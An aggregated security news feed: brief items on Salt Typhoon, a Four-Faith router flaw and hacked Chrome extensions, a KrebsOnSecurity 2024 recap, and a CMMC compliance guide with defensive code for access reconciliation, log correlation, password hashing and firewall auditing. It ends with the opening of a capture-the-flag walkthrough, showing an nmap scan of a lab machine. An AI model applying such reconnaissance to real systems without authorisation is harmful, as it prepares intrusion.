Verizon says it has secured its network after breach by China-linked Salt Typhoon group

U.S. telecom giant Verizon says it has secured its network after being targeted by the China-linked Salt Typhoon cyberespionage group. In a statement given to TechCrunch on Sunday, Verizon spokesperson Richard Young said the company has “contained the cyber incident brought on by this nation-state threat actor,” and that it has not detected any threat actor […]


Source: Security News | TechCrunch

Critical Flaw Exposes Four-Faith Routers to Remote Exploitation

SUMMARY: VulnCheck has discovered a critical new vulnerability (CVE-2024-12856) affecting Four-Faith industrial routers (F3x24 and F3x36), with evidence…

Source: Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News

Happy 15th Anniversary, KrebsOnSecurity!

Image: Shutterstock, Dreamansions.

KrebsOnSecurity.com turns 15 years old today! Maybe it’s indelicate to celebrate the birthday of a cybercrime blog that mostly publishes bad news, but happily many of 2024’s most engrossing security stories were about bad things happening to bad guys. It’s also an occasion to note that despite my publishing fewer stories than ever this past year, we somehow managed to attract near record levels of readership (thank you!).

In case you missed any of them, here’s a recap of 2024’s most-read stories. In January, KrebsOnSecurity told the story of a Canadian man who was falsely charged with larceny and lost his job after becoming the victim of a complex e-commerce scam known as triangulation fraud. This can occur when you buy something online — from a seller on Amazon or eBay, for example — but the seller doesn’t actually own the item for sale. Instead, they purchase the item using stolen payment card data and your shipping address. In this scam, you receive what you ordered, and the only party left to dispute the transaction is the owner of the stolen payment card.

Triangulation fraud. Image: eBay Enterprise.

March featured several investigations into the history of various people-search data broker services. One story exposed how the Belarusian CEO of the privacy and data removal service OneRep had actually founded dozens of people-search services, including many that OneRep was offering to remove people from for a fee. That story quickly prompted Mozilla to terminate its partnership with OneRep, which Mozilla had bundled as a privacy option for Firefox users.

A story digging into the consumer data broker Radaris found its CEO was a fabricated identity, and that the company’s founders were Russian brothers in Massachusetts who operated multiple Russian language dating services and affiliate programs, in addition to a dizzying array of people-search websites.

Radaris repeatedly threatened to sue KrebsOnSecurity unless that publication was retracted in full, alleging that it was replete with errors both factual and malicious. Instead, we doubled down and published all of the supporting evidence that wasn’t included in the original story, leaving little room for doubt about its conclusions. Fittingly, Radaris now pimps OneRep as a service when consumers request that their personal information be removed from the data broker’s website.

Easily the longest story this year was an investigation into Stark Industries Solutions, a large, mysterious new Internet hosting firm that materialized when Russia invaded Ukraine. That piece revealed how Stark was being used as a global proxy network to conceal the true source of cyberattacks and disinformation campaigns against enemies of Russia.

The homepage of Stark Industries Solutions.

Much of my summer was spent reporting a story about how advertising and marketing firms have created a global free-for-all where anyone can track the daily movements and associations of hundreds of millions of mobile devices, thanks to the ubiquity of mobile location data that is broadly and cheaply available.

Research published in September explored the dark nexus between harm groups and cybercrime communities consumed with perpetrating financial fraud. That analysis found an increasing number of young, Western cybercriminals are also members of fast-growing online groups that exist solely to bully, stalk, harass and extort vulnerable teens into physically harming themselves and others.

One focus of that story was a Canadian cybercriminal who used the nickname Judische. Identified by the Mandiant as one of the most consequential threat actors of 2024, Judische was responsible for a hacking rampage that exposed private information on hundreds of millions of Americans.  That story withheld Judische’s real name, but the reporting came in handy in late October when a 25-year-old Canadian man named Connor Riley Moucka was arrested and charged with 20 criminal counts connected to the Snowflake data extortions.

A surveillance photo of Connor Riley Moucka, a.k.a. “Judische” and “Waifu,” dated Oct 21, 2024, 9 days before Moucka’s arrest. This image was included in an affidavit filed by an investigator with the Royal Canadian Mounted Police (RCMP).

In November, KrebsOnSecurity published a profile of Judische’s accomplice — a hacker known as Kiberphant0m — detailing how Kiberphant0m had left a trail of clues strongly suggesting that they are or recently were a U.S. Army soldier stationed in South Korea.

My reporting in December was mainly split between two investigations. The first profiled Cryptomus, a dodgy cryptocurrency exchange allegedly based in Canada that has become a major payment processor and sanctions evasion platform for dozens of Russian exchanges and cybercrime services online.

How to Lose a Fortune with Just One Bad Click told the sad tales of two cryptocurrency heist victims who were scammed out of six and seven figures after falling for complex social engineering schemes over the phone. In these attacks, the phishers abused at least four different Google services to trick targets into believing they were speaking with a Google representative, and into giving thieves control over their account with a single click. Look for a story here in early 2025 that will explore the internal operations of these ruthless and ephemeral voice phishing gangs.

Before signing off for 2024, allow me to remind readers that the reporting we’re able to provide here is made possible primarily by the ads you may see at the top of this website. If you currently don’t see any ads when you load this website, please consider enabling an exception in your ad blocker for KrebsOnSecurity.com. There is zero third-party content on this website, apart from the occasional Youtube video embedded as part of a story. More importantly, all of our ads are static images or GIFs that are vetted by me and served in-house directly.

Fundamentally, my work is supported and improved by your readership, tips, encouragement and, yes, criticism. So thank you for that, and keep it coming, please.

Here’s to a happy, healthy, wealthy and wary 2025. Hope to see you all again in the New Year!

Source: Krebs on Security

Study Finds AI Can Guess Crypto Seed Phrases in 0.02 Seconds

IN THIS ARTICLE, YOU WILL LEARN: NFT-focused news website NFTEvening and the NFT market’s data and analytics-based platform…

Source: Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News

16 Chrome Extensions Hacked, Exposing Over 600,000 Users to Data Theft

A new attack campaign has targeted known Chrome browser extensions, leading to at least 16 extensions being compromised and exposing over 600,000 users to data exposure and credential theft.
The attack targeted publishers of browser extensions on the Chrome Web Store via a phishing campaign and used their access permissions to insert malicious code into legitimate extensions in order to steal

Source: The Hacker News

The CMMC Countdown, Part 4

The CMMC Final Rule became effective on December 16, 2024. We will finish reviewing the remaining five-pointers to ensure we can obtain a conditional CMMC certificate if we cannot achieve a 110 score.

CMMC Action Plan continued

PS.L2-3.9.2

Ensure that organizational systems containing CUI are protected during and after personnel actions such as terminations and transfers.

Determine if:

[a] a policy and/or process for terminating system access and any credentials coincident with personnel actions is established;
[b] system access and credentials are terminated consistent with personnel actions such as termination or transfer; and
[c] the system is protected during and after personnel transfer actions.

Consider creating onboarding, offboarding, and transfer procedures. These procedures should define how all access is revoked upon termination and how some access is granted and revoked during a transfer. For a transfer, personnel should gain access to CUI when they transfer into a role that requires it. Conversely, access to CUI should be revoked when they transfer to a role where CUI access is unnecessary.
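One way to produce evidence for objectives [b] and [c] is to reconcile the HR roster against the identity provider on a schedule and record every mismatch. The following is an added example (not the post's own code, and not any CMMC tooling): the roster, the account list, the role names and the `CUI-Users` group name are constructed assumptions, and the checks are the ones the procedure above implies, namely that terminated personnel have disabled, group-less accounts, that CUI group membership matches the current role after a transfer, and that no enabled account lacks an owner on the roster.

```python
"""Offboarding / transfer reconciliation: compare the HR roster with IdP
accounts and report access that contradicts a personnel action.
Example code added for illustration; the roster, account list, role names
and group name are constructed, not taken from any real system."""
from dataclasses import dataclass, field
from datetime import date

CUI_GROUP = "CUI-Users"                 # assumed IdP group that grants CUI access
CUI_ROLES = {"engineer", "contracts"}   # assumed roles whose duties require CUI


@dataclass
class Person:
    username: str
    status: str        # "active", "terminated" or "transferred"
    role: str          # current role (after the transfer, if any)
    effective: date    # date of the latest personnel action


@dataclass
class Account:
    username: str
    enabled: bool
    groups: set = field(default_factory=set)


def reconcile(roster, accounts):
    """Return (username, code, detail) findings; an empty list means the
    IdP state agrees with every personnel action on the roster."""
    by_user = {a.username: a for a in accounts}
    findings = []
    for p in roster:
        acct = by_user.get(p.username)
        if acct is None:
            if p.status != "terminated":
                findings.append((p.username, "NO_ACCOUNT", f"{p.status} person has no IdP account"))
            continue
        if p.status == "terminated":
            # Termination: the account must be disabled and stripped of all groups.
            if acct.enabled:
                findings.append((p.username, "TERMINATED_ENABLED", f"terminated {p.effective}, account still enabled"))
            if acct.groups:
                findings.append((p.username, "TERMINATED_GROUPS", f"still in {sorted(acct.groups)}"))
            continue
        # Active or transferred: CUI group membership must match the current role.
        needs_cui = p.role in CUI_ROLES
        has_cui = CUI_GROUP in acct.groups
        if has_cui and not needs_cui:
            findings.append((p.username, "EXCESS_CUI", f"role {p.role} does not require CUI"))
        if needs_cui and not has_cui:
            findings.append((p.username, "MISSING_CUI", f"role {p.role} requires CUI access"))
    # Enabled accounts with no roster entry are unowned: assign an owner or disable them.
    known = {p.username for p in roster}
    for a in accounts:
        if a.username not in known and a.enabled:
            findings.append((a.username, "ORPHAN_ENABLED", "enabled account with no roster entry"))
    return findings


def reconcile_sample():
    """Run the check over a constructed roster and account list."""
    roster = [
        Person("alice", "active", "engineer", date(2023, 3, 1)),
        Person("bob", "terminated", "engineer", date(2024, 12, 10)),
        Person("carol", "transferred", "marketing", date(2024, 12, 16)),   # left engineering
        Person("dave", "transferred", "contracts", date(2024, 12, 16)),    # moved into contracts
    ]
    accounts = [
        Account("alice", True, {CUI_GROUP}),
        Account("bob", True, {CUI_GROUP}),          # offboarding never completed
        Account("carol", True, {CUI_GROUP}),        # old access not revoked on transfer
        Account("dave", True, set()),               # new access not granted on transfer
        Account("svc-legacy", True, set()),         # nobody on the roster owns this
    ]
    return reconcile(roster, accounts)


if __name__ == "__main__":
    for user, code, detail in reconcile_sample():
        print(f"{code:20} {user:12} {detail}")
```

In practice the two lists would come from an HRIS export and an IdP user export; running the comparison as part of the periodic access review and keeping its output gives the assessor a dated record that terminations and transfers were acted on.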

PE.L2-3.10.1

Limit physical access to organizational systems, equipment, and the respective operating environments to authorized individuals.

Determine if:

[a] authorized individuals allowed physical access are identified;
[b] physical access to organizational systems is limited to authorized individuals;
[c] physical access to equipment is limited to authorized individuals; and
[d] physical access to operating environments is limited to authorized individuals.

Consider having a separate CMMC environment, as mentioned in previous posts. You could show your access list if you have an access control system, like a badge reader. Consider writing a procedure that describes how the access list is reviewed and updated. Consider maintaining an inventory list of the CUI devices in your CMMC environment and writing a procedure for updating that list. You should be able to leverage your procedures from the AC domain to show how access is granted to these devices. The inventory list should also identify the networking equipment and security systems and how access to them is restricted to the personnel responsible for maintaining them, such as the IT team.

PE.L2-3.10.2

Protect and monitor the physical facility and support infrastructure for organizational systems.

Determine if:

[a] the physical facility where organizational systems reside is protected;
[b] the support infrastructure for organizational systems is protected;
[c] the physical facility where organizational systems reside is monitored; and
[d] the support infrastructure for organizational systems is monitored.

We can show the access logs generated by the access control system identified in PE.L2-3.10.1. If you rely on a physical key and a video system, like Ring, consider creating a key distribution log, filling out the log to check out the key, and collecting the video logs. That way, you can show who is authorized to lock and unlock the door and show video surveillance at the door.

CA.L2-3.12.1

Periodically assess the security controls in organizational systems to determine if the controls are effective in their application.

Determine if:

[a] the frequency of security control assessments is defined; and
[b] security controls are assessed with the defined frequency to determine if the controls are effective in their application.

The CMMC controls must be certified by a C3PAO every three years. Within those three years, a yearly SPRS score must be submitted. Consider doing a quarterly self-assessment for one-fourth of the CMMC controls or a yearly one for one-third. You will have self-assessed each control after one year or three years, whichever frequency you choose. Consider defining the schedule in the SSP. Keep a formal record of each self-assessment and consider having them signed by your leadership. Document any findings in the POAM.

CA.L2-3.12.3

Monitor security controls on an ongoing basis to ensure the continued effectiveness of the controls.

Determine if:

[a] security controls are monitored on an ongoing basis to ensure the continued effectiveness of those controls.

Consider setting up monitoring tools that automatically assess your organization’s security posture. You can use tools like Microsoft Defender XDR, Microsoft Intune, Nessus, and Greenbone.

SC.L2-3.13.1

Monitor, control, and protect communications (i.e., information transmitted or received by organizational systems) at the external boundaries and key internal boundaries of organizational systems.

Determine if:

[a] the external system boundary is defined;
[b] key internal system boundaries are defined;
[c] communications are monitored at the external system boundary;
[d] communications are monitored at key internal boundaries;
[e] communications are controlled at the external system boundary;
[f] communications are controlled at key internal boundaries;
[g] communications are protected at the external system boundary; and
[h] communications are protected at key internal boundaries.

Consider creating a drawing that describes your organizational network. An external system boundary could be your on-site firewall and VPN connection for remote users. Your internal system boundaries could include any VLANs that segregate system resources. The monitoring could be syslog events sent to a SIEM. The controls could be your firewall rules and network ACLs. The protection could be SSL and VPN encryption. Consider implementing web content filtering as an additional layer.

SC.L2-3.13.2

Employ architectural designs, software development techniques, and systems engineering principles that promote effective information security within organizational systems.

Determine if:

[a] architectural designs that promote effective information security are identified;
[b] software development techniques that promote effective information security are identified;
[c] systems engineering principles that promote effective information security are identified;
[d] identified architectural designs that promote effective information security are employed;
[e] identified software development techniques that promote effective information security are employed; and
[f] identified systems engineering principles that promote effective information security are employed.

Consider defining the system architecture for your CMMC environment along with a list of security principles and requirements. The principles should define how changes to the environment will preserve its security posture. The requirements should be testable and verifiable. For example, a new cloud environment must have a valid FedRAMP or SOC 2 Type II certification, and a firewall and VPN must have valid FIPS 140-3 certification.

SI.L2-3.14.1

Identify, report, and correct system flaws in a timely manner.

Determine if:

[a] the time within which to identify system flaws is specified;
[b] system flaws are identified within the specified time frame;
[c] the time within which to report system flaws is specified;
[d] system flaws are reported within the specified time frame;
[e] the time within which to correct system flaws is specified; and
[f] system flaws are corrected within the specified time frame.

Consider defining a procedure with SLAs. For example, the IT team will:

  • Subscribe to the CISA Cybersecurity Alerts & Advisories.
  • Monitor the email inbox where the advisories are sent at least twice a week.
  • Create a remediation task for any relevant vulnerabilities:
    • low-severity CVEs will be due in six months, and
    • critical CVEs will be due in 30 days.

SI.L2-3.14.2

Provide protection from malicious code at designated locations within organizational systems.

Determine if:

[a] designated locations for malicious code protection are identified; and
[b] protection from malicious code at designated locations is provided.

Install antivirus software on every machine that contains CUI. Also, consider adding a security subscription to your cloud storage so it performs antivirus scans on your files stored in the cloud.

SI.L2-3.14.3

Monitor system security alerts and advisories and take action in response.

Determine if:

[a] response actions to system security alerts and advisories are identified;
[b] system security alerts and advisories are monitored; and
[c] actions in response to system security alerts and advisories are taken.

Consider subscribing to the CISA Cybersecurity Alerts & Advisories. Your security tools, like Microsoft Defender XDR, might have advisory alerts, but you must configure them. As mentioned, you will want to create remediation tasks to show you are responding to advisories.

AU.L2-3.3.5

Correlate audit record review, analysis, and reporting processes for investigation and response to indications of unlawful, unauthorized, suspicious, or unusual activity.

Determine if:

[a] audit record review, analysis, and reporting processes for investigation and response to indications of unlawful, unauthorized, suspicious, or unusual activity are defined; and
[b] defined audit record review, analysis, and reporting processes are correlated.

Consider setting up a SIEM and sending all your logs there. The SIEM should provide you with reports that can help detect unwanted activity. Review the reports periodically. Consider a monthly review since quarterly reviews may be too long, and weekly reviews might be too often and tiring.
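Objective [b] asks that review, analysis and reporting be correlated rather than three unrelated reports. Below is an added example of what a correlated SIEM rule looks like at the smallest scale; it is not code from the post or from any SIEM product. It parses standard OpenSSH syslog lines, then raises one alert when a burst of failed logins for a user from one source is immediately followed by a success from that same source, and another when a successful login lands outside business hours. The log lines, the year (syslog omits it) and the 07:00 to 19:00 window are constructed assumptions.

```python
"""Correlate SSH authentication records the way a SIEM report would: a burst of
failures followed by a success, and successful logins outside business hours.
Example code added for illustration; the log lines, the year and the
business-hours window are constructed assumptions, not from any real SIEM."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# OpenSSH syslog format:
# "<Mon DD HH:MM:SS> <host> sshd[pid]: <Failed|Accepted> <method> for [invalid user] <user> from <src> port <n> ssh2"
LOG_RE = re.compile(
    r"^(\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (\S+) sshd\[\d+\]: "
    r"(Failed|Accepted) (\w+) for (?:invalid user )?(\S+) from (\S+) port \d+"
)


def parse(line, year=2024):
    """Return a dict for an sshd auth record, or None for lines the rule ignores.
    syslog omits the year, so the caller supplies it (assumed 2024 here)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group(1), "%b %d %H:%M:%S").replace(year=year)
    return {"ts": ts, "host": m.group(2), "result": m.group(3),
            "method": m.group(4), "user": m.group(5), "src": m.group(6)}


def correlate(lines, threshold=3, window=timedelta(minutes=5), business_hours=(7, 19)):
    """Return alert tuples (rule, user, src, detail) in timestamp order."""
    events = sorted((e for e in map(parse, lines) if e), key=lambda e: e["ts"])
    failures = defaultdict(deque)     # (user, src) -> timestamps of recent failures
    alerts = []
    for e in events:
        q = failures[(e["user"], e["src"])]
        while q and e["ts"] - q[0] > window:     # drop failures older than the window
            q.popleft()
        if e["result"] == "Failed":
            q.append(e["ts"])
            continue
        # A success: was it preceded by a burst of failures from the same source?
        if len(q) >= threshold:
            alerts.append(("FAILURES_THEN_SUCCESS", e["user"], e["src"],
                           f"{len(q)} failures within {window}"))
        q.clear()
        start, end = business_hours
        if not (start <= e["ts"].hour < end):
            alerts.append(("OFF_HOURS_LOGIN", e["user"], e["src"], e["ts"].strftime("%H:%M")))
    return alerts


# Constructed sample log (RFC 5737 documentation addresses, not real hosts).
SAMPLE_LOG = """\
Dec 27 08:01:10 vpn01 sshd[2001]: Failed password for alice from 203.0.113.7 port 50122 ssh2
Dec 27 08:01:13 vpn01 sshd[2001]: Failed password for alice from 203.0.113.7 port 50123 ssh2
Dec 27 08:01:15 vpn01 sshd[2001]: Failed password for alice from 203.0.113.7 port 50124 ssh2
Dec 27 08:01:20 vpn01 sshd[2002]: Accepted password for alice from 203.0.113.7 port 50125 ssh2
Dec 27 08:30:00 vpn01 sshd[2100]: Failed password for bob from 198.51.100.4 port 40001 ssh2
Dec 27 08:31:00 vpn01 sshd[2101]: Accepted publickey for bob from 198.51.100.4 port 40002 ssh2
Dec 27 09:00:00 vpn01 systemd[1]: Started Session 12 of user bob.
Dec 27 23:15:00 vpn01 sshd[2200]: Accepted password for bob from 192.0.2.9 port 40010 ssh2
""".splitlines()


def run_sample():
    """Correlate the constructed log; two alerts are expected."""
    return correlate(SAMPLE_LOG)


if __name__ == "__main__":
    for rule, user, src, detail in run_sample():
        print(f"{rule:22} user={user:8} src={src:14} {detail}")
```

The monthly review the post recommends then becomes a review of such alerts plus the failure-only noise the rule deliberately suppressed (bob's single failure followed by a key login raises nothing), and the triage decision for each alert is what you record as the "response" evidence for the objective.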

CM.L2-3.4.5

Define, document, approve, and enforce physical and logical access restrictions associated with changes to organizational systems.

Determine if:

[a] physical access restrictions associated with changes to the system are defined;
[b] physical access restrictions associated with changes to the system are documented;
[c] physical access restrictions associated with changes to the system are approved;
[d] physical access restrictions associated with changes to the system are enforced;
[e] logical access restrictions associated with changes to the system are defined;
[f] logical access restrictions associated with changes to the system are documented;
[g] logical access restrictions associated with changes to the system are approved; and
[h] logical access restrictions associated with changes to the system are enforced.

Consider putting networking equipment in a locked networking room only accessible by authorized personnel like the IT team. Also, administrator accounts for the IT team should be created, and permission should only be given to those accounts to make configuration changes.

CM.L2-3.4.6

Employ the principle of least functionality by configuring organizational systems to provide only essential capabilities.

Determine if:

[a] essential system capabilities are defined based on the principle of least functionality; and
[b] the system is configured to provide only the defined essential capabilities.

There should be regular user accounts and administrator accounts. Everyone will have a regular user account with no privileges to modify the CMMC environment. Only the authorized personnel, like the IT team, will have administrator accounts. There should be a super administrator (who can make any change) and limited administrators (with limited privileges based on job role).

CM.L2-3.4.7

Restrict, disable, or prevent the use of nonessential programs, functions, ports, protocols, and services.

Determine if:

[a] essential programs are defined;
[b] the use of nonessential programs is defined;
[c] the use of nonessential programs is restricted, disabled, or prevented as defined;
[d] essential functions are defined;
[e] the use of nonessential functions is defined;
[f] the use of nonessential functions is restricted, disabled, or prevented as defined;
[g] essential ports are defined;
[h] the use of nonessential ports is defined;
[i] the use of nonessential ports is restricted, disabled, or prevented as defined;
[j] essential protocols are defined;
[k] the use of nonessential protocols is defined;
[l] the use of nonessential protocols is restricted, disabled, or prevented as defined;
[m] essential services are defined;
[n] the use of nonessential services is defined; and
[o] the use of nonessential services is restricted, disabled, or prevented as defined.

Consider having software that blocks blacklisted programs, functions, ports, protocols, and services. Another approach is configuring the computer with the bare minimum of programs, functions, ports, protocols, and services. Put restrictions that will require an administrator to approve any modifications.

CM.L2-3.4.8

Apply deny-by-exception (blacklisting) policy to prevent the use of unauthorized software or deny-all, permit-by-exception (whitelisting) policy to allow the execution of authorized software.

Determine if:

[a] a policy specifying whether whitelisting or blacklisting is to be implemented is specified;
[b] the software allowed to execute under whitelisting or denied use under blacklisting is specified; and
[c] whitelisting to allow the execution of authorized software or blacklisting to prevent the use of unauthorized software is implemented as specified.

Blacklisting is the easiest, while whitelisting is the more secure solution. Tools like Microsoft Defender XDR can prevent the execution of blacklisted software. You can use Software Restriction Policies in Windows to whitelist or blacklist too.

IA.L2-3.5.10

Store and transmit only cryptographically-protected passwords.

Determine if:

[a] passwords are cryptographically protected in storage; and
[b] passwords are cryptographically protected in transit.

Consider using an identity provider (IdP), like Microsoft Entra ID, to perform the cryptography for you. Use SSO, SAML, or OpenID Connect to use your IdP to log into any third-party and custom applications.
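For the custom applications that still keep their own credentials, objective [a] means a per-user salt and a deliberately slow key-derivation function, never a plain or unsalted fast hash. The block below is an added example, not code from the post or from any IdP: it stores passwords as a self-describing `pbkdf2_sha256$<iterations>$<salt>$<hash>` record (a format assumed for this example), verifies them in constant time, and flags records that need re-hashing when the work factor is raised. The iteration count follows the OWASP Password Storage Cheat Sheet recommendation for PBKDF2-HMAC-SHA256; the unsalted function at the end is there only to show why equal passwords must not produce equal stored values.

```python
"""Store passwords only in cryptographically protected form: a per-user random
salt plus a slow key-derivation function, verified in constant time.
Example code added for illustration, not from the post; the record format
'pbkdf2_sha256$<iters>$<salt>$<hash>' is an assumption of this example."""
import base64
import hashlib
import hmac
import os

ITERATIONS = 600_000   # PBKDF2-HMAC-SHA256 work factor (OWASP Password Storage Cheat Sheet)
ALGO = "pbkdf2_sha256"


def hash_password(password: str, iterations: int = ITERATIONS) -> str:
    """Derive a salted hash; the salt and parameters travel with the record."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, dklen=32)
    return "$".join([ALGO, str(iterations),
                     base64.b64encode(salt).decode("ascii"),
                     base64.b64encode(dk).decode("ascii")])


def _parse(stored: str):
    """Split a record into (algo, iterations, salt, hash); None if malformed."""
    try:
        algo, iters, salt_b64, dk_b64 = stored.split("$")
        return algo, int(iters), base64.b64decode(salt_b64), base64.b64decode(dk_b64)
    except (ValueError, TypeError):
        return None


def verify_password(password: str, stored: str) -> bool:
    """Recompute the derivation with the stored salt and compare in constant time."""
    parsed = _parse(stored)
    if parsed is None or parsed[0] != ALGO:
        return False
    _, iterations, salt, expected = parsed
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt,
                                    iterations, dklen=len(expected))
    return hmac.compare_digest(candidate, expected)


def needs_rehash(stored: str, target_iterations: int = ITERATIONS) -> bool:
    """True when a record is weaker than current policy; rehash at the next successful login."""
    parsed = _parse(stored)
    return parsed is None or parsed[0] != ALGO or parsed[1] < target_iterations


def legacy_unsalted(password: str) -> str:
    """What NOT to do: an unsalted fast hash. Equal passwords give equal digests,
    so every user who chose the same password is exposed by one lookup."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


if __name__ == "__main__":
    record = hash_password("correct horse battery staple")
    print(record)
    print(verify_password("correct horse battery staple", record),
          verify_password("wrong", record))
```

Objective [b], protection in transit, is not something this code can provide; it comes from only ever sending the password over TLS (or, better, from the SSO/SAML/OpenID Connect flow the post recommends, where the application never sees the password at all).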

MA.L2-3.7.5

Require multifactor authentication to establish nonlocal maintenance sessions via external network connections and terminate such connections when nonlocal maintenance is complete.

Determine if:

[a] multifactor authentication is used to establish nonlocal maintenance sessions via external network connections; and
[b] nonlocal maintenance sessions established via external network connections are terminated when nonlocal maintenance is complete.

Ensure that MFA is enabled for remote support solutions and remote desktop protocols. For connections that require SSH, consider allowing SSH only from a machine that itself requires MFA to authenticate.

MP.L2-3.8.7

Control the use of removable media on system components.

Determine if:

[a] the use of removable media on system components is controlled.

The simplest solution is to block removable media. If removable media is necessary, limit mounting the media to an administrator account.

RA.L2-3.11.2

Scan for vulnerabilities in organizational systems and applications periodically and when new vulnerabilities affecting those systems and applications are identified.

Determine if:

[a] the frequency to scan for vulnerabilities in organizational systems and applications is defined;
[b] vulnerability scans are performed on organizational systems with the defined frequency;
[c] vulnerability scans are performed on applications with the defined frequency;
[d] vulnerability scans are performed on organizational systems when new vulnerabilities are identified; and
[e] vulnerability scans are performed on applications when new vulnerabilities are identified.

Consider using vulnerability scanning software, like Nessus, and perform vulnerability scans on the operating systems and installed applications. If you are developing CUI software, consider using a vulnerability scanner, such as Snyk, for application libraries, like npm and pip packages.

SC.L2-3.13.5

Implement subnetworks for publicly accessible system components that are physically or logically separated from internal networks.

Determine if:

[a] publicly accessible system components are identified; and
[b] subnetworks for publicly accessible system components are physically or logically separated from internal networks.

Create a separate VLAN and subnet for systems that can be accessed from the Internet. Ideally, this network should be separated by a DMZ and/or a firewall and should not be able to reach internal, non-public networks.

SC.L2-3.13.6

Deny network communications traffic by default and allow network communications traffic by exception (i.e., deny all, permit by exception).

Determine if:

[a] network communications traffic is denied by default; and
[b] network communications traffic is allowed by exception.

The firewall rule set should have deny as the last rule. The preceding rules should allow specific traffic.
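The reason the explicit final deny matters is that without it the outcome depends on the device's implicit policy, which is not always deny. The following is an added example (not code from the post or from any firewall vendor) that models first-match evaluation of an ordered rule set and audits it for the two defects a reviewer checks for: no catch-all deny at the end, and a catch-all placed early enough to shadow the rules after it. The rules, addresses and packets are constructed.

```python
"""Deny-all, permit-by-exception: evaluate an ordered firewall rule set with
first-match semantics and audit it for a missing or misplaced catch-all deny.
Example code added for illustration; rule sets and packets are constructed."""
import ipaddress

# A rule is a dict with proto, dport, src and action; "any" wildcards a field.


def matches(rule, pkt):
    """True when the packet satisfies every non-wildcard field of the rule."""
    if rule["proto"] != "any" and rule["proto"] != pkt["proto"]:
        return False
    if rule["dport"] != "any" and rule["dport"] != pkt["dport"]:
        return False
    if rule["src"] != "any" and ipaddress.ip_address(pkt["src"]) not in ipaddress.ip_network(rule["src"]):
        return False
    return True


def evaluate(rules, pkt, implicit="deny"):
    """First matching rule wins; 'implicit' is the device's policy when nothing matches."""
    for rule in rules:
        if matches(rule, pkt):
            return rule["action"], rule["name"]
    return implicit, "implicit-" + implicit


def is_catch_all(rule):
    return rule["proto"] == "any" and rule["dport"] == "any" and rule["src"] == "any"


def audit_ruleset(rules):
    """Return the review findings for a rule set (empty list = passes)."""
    problems = []
    if not rules or not (is_catch_all(rules[-1]) and rules[-1]["action"] == "deny"):
        problems.append("last rule is not an explicit deny-all")
    for i, rule in enumerate(rules[:-1]):
        if is_catch_all(rule):
            problems.append(f"rule {i} ('{rule['name']}') is a catch-all; later rules are never reached")
    return problems


ALLOW_RULES = [
    {"name": "vpn-in",   "proto": "udp", "dport": 1194, "src": "any",          "action": "allow"},
    {"name": "https-in", "proto": "tcp", "dport": 443,  "src": "any",          "action": "allow"},
    {"name": "mgmt-ssh", "proto": "tcp", "dport": 22,   "src": "10.10.0.0/24", "action": "allow"},
]
WEAK_RULES = ALLOW_RULES                                   # exceptions only, no final deny
HARDENED_RULES = ALLOW_RULES + [
    {"name": "deny-all", "proto": "any", "dport": "any", "src": "any", "action": "deny"},
]

# Constructed packets (RFC 5737 documentation addresses).
SAMPLE_PACKETS = [
    {"proto": "tcp", "dport": 443,  "src": "203.0.113.5"},   # public HTTPS: expected allow
    {"proto": "tcp", "dport": 3389, "src": "203.0.113.5"},   # RDP from the Internet: must be denied
    {"proto": "tcp", "dport": 22,   "src": "10.10.0.7"},     # SSH from the management subnet
    {"proto": "tcp", "dport": 22,   "src": "203.0.113.5"},   # SSH from the Internet: must be denied
    {"proto": "udp", "dport": 1194, "src": "198.51.100.9"},  # VPN client
]


def compare():
    """Evaluate each packet against both rule sets on a device whose implicit
    policy is 'allow', the case the explicit last rule guards against."""
    results = {}
    for pkt in SAMPLE_PACKETS:
        key = f'{pkt["proto"]}/{pkt["dport"]} from {pkt["src"]}'
        results[key] = (evaluate(WEAK_RULES, pkt, implicit="allow")[0],
                        evaluate(HARDENED_RULES, pkt, implicit="allow")[0])
    return results


if __name__ == "__main__":
    print("audit weak:    ", audit_ruleset(WEAK_RULES))
    print("audit hardened:", audit_ruleset(HARDENED_RULES))
    for key, (weak, hard) in compare().items():
        print(f"{key:32} weak={weak:5} hardened={hard}")
```

The audit function is the part worth keeping: run it against an exported rule set whenever the firewall changes, and the assessor can see both that the last rule is a deny and that nothing above it silently shadows the exceptions.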

SC.L2-3.13.15

Protect the authenticity of communications sessions.

Determine if:

[a] the authenticity of communications sessions is protected.

All web traffic should be HTTPS with a valid TLS certificate. HTTP traffic should be blocked. SSL or a similar encryption technology should encrypt VPN traffic.

SI.L2-3.14.4

Update malicious code protection mechanisms when new releases are available.

Determine if:

[a] malicious code protection mechanisms are updated when new releases are available.

Your antivirus software should check for updates automatically, at least daily (hourly is best), and apply them without manual intervention.

SI.L2-3.14.6

Monitor organizational systems, including inbound and outbound communications traffic, to detect attacks and indicators of potential attacks.

Determine if:

[a] the system is monitored to detect attacks and indicators of potential attacks;
[b] inbound communications traffic is monitored to detect attacks and indicators of potential attacks; and
[c] outbound communications traffic is monitored to detect attacks and indicators of potential attacks.

Consider using a combination of SIEM, MDR, and XDR to analyze your logs and detect potential threats and attacks.

Before you go

Wishing you much success in your CMMC certification journey.

Sign up for my mailing list at https://miguelacallesmba.medium.com/subscribe

Source: Secjuice

HTB Socket Walkthrough

And welcome back, my friends, to this relatively simple but very interesting BOX, with a small reverse engineering section that I love so much and that I hope you will, too. Also interesting is the part about privesc, in which ChatGPT, as has recently happened, had a small contribution. But let’s not get lost in chatter, and let’s get started.

The nmap scan:

Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-20 15:18 EDT
Nmap scan report for 10.10.11.206
Host is up (0.11s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
|_  256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://qreader.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
